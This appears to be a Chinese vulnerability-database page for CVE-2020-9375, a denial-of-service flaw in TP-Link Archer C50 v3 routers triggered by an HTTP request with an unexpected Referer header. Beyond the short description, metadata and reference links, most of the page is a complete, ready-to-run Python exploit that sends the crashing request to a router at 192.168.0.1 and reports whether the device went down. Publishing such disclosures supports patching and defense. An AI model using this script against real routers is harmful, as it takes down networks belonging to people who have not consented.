TP-Link Archer C50 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1971942 漏洞类型 其他
发布时间 2020-03-29 更新时间 2020-04-01
CVE编号 CVE-2020-9375 CNNVD-ID CNNVD-202003-1578
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2020030170
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-1578
|漏洞详情
TP-Link Archer C50是中国普联(TP-Link)公司的一款无线路由器。 TP-Link Archer C50 V3 Build 200318 Rel. 62209之前版本中存在安全漏洞。远程攻击者可借助带有非法Referer字段的HTTP报头利用该漏洞造成拒绝服务。
|漏洞EXP
# Exploit Title: TP-Link Archer C50 v3 Denial of Service
# Date: 25-01-2020
# Exploit Author: thewhiteh4t
# Vendor Homepage: https://www.tp-link.com/
# Version: TP-Link Archer C50 v3 Build 171227
# Tested on: Arch Linux x64
# CVE: CVE-2020-9375
# Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html

import time
import socket

ip = '192.168.0.1'
port = 80

print('[+] IP   : ' + ip)
print('[+] Port : ' + str(port))

for i in range(2):
	time.sleep(1)
	try:
		print('[+] Initializing Socket...')
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.settimeout(5)
		print('[!] Connecting to target...')
		s.connect((ip, port))
		header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip)
		header = header.encode()
		print('[!] Sending Request...')
		s.sendall(header)
		print('[!] Disconnecting Socket...')
		s.close()
		if i == 1:
			print('[-] Exploit Failed!')
			break
	except Exception as e:
		if 'Connection refused' in str(e):
			print('[+] Connection Refused...Exploit Successful!')
			break
		else:
			print('[-] Exploit Failed!')
			break
|参考资料

来源:CONFIRM

链接:https://www.tp-link.com/in/support/download/archer-c50/v3/#Firmware


来源:MISC

链接:https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2020-9375